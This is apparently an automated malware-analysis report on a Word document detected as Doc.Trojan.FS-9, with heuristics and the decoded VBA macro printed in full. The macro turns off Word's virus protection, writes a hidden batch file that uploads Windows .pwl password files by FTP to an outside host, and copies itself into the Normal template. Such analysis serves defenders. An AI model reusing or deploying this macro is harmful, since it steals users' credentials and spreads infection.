MALICIOUS
200
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
The sample is a Microsoft Word document containing VBA macros. The macros utilize the Shell() function to execute a batch file located at 'c:\-.bat'. This batch file is designed to connect to 'ftp.hello.com.tw' via FTP and upload a file named '-', which appears to be a list of password files. This indicates an attempt to exfiltrate sensitive information or download a secondary payload.
Heuristics 3
-
ClamAV: Doc.Trojan.FS-9 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.FS-9
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1452 bytes |
SHA-256: ed76e2a478cd3a22427fa4238f3b07047b51a656e607aff8cf7f1d43bada170b |
|||
|
Detection
ClamAV:
Doc.Trojan.FS-9
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Copyright (C) 1998 by FlyShadow ~^^~ - Lurcher
Private Declare Function RasEnumConnections Lib "RasApi32.DLL" Alias "RasEnumConnectionsA" (lprasconn As Any, lpcb As Long, lpcConnections As Long) As Long
Private Sub Document_Close()
On Error Resume Next
Options.VirusProtection = 1 - 1
Options.SaveNormalPrompt = 1 - 1
If RasEnumConnections(32, 0, 0) <> 0 Then
Open "c:\-.bat" For Output As #1
Print #1, "@echo off" & Chr(13) & Chr(10) & "ctty nul" & Chr(13) & Chr(10) & "echo virii>-" & Chr(13) & Chr(10) & "echo hieis>>-" & Chr(13) & Chr(10) & "echo binary>>-" & Chr(13) & Chr(10) & "for %%. in (%windir%\*.pwl) do echo put %%.>>-" & Chr(13) & Chr(10) & "echo bye>>-" & Chr(13) & Chr(10) & "ftp -s:- ftp.hello.com.tw" & Chr(13) & Chr(10) & "del -|del -.bat" & Chr(13) & Chr(10) & "ctty con" & Chr(13) & Chr(10)
Close #1: Shell "c:\-.bat", 0: End If
Set α = IIf(MacroContainer <> "Normal.dot", NormalTemplate, ActiveDocument)
With α.VBProject.VBComponents(1).CodeModule
If υ.Find("~^^~", 0, 0, 0, 0, 0, 0) = 0 Then _
.DeleteLines 1, .CountOfLines: _
.AddFromString ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 70)
End With: End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.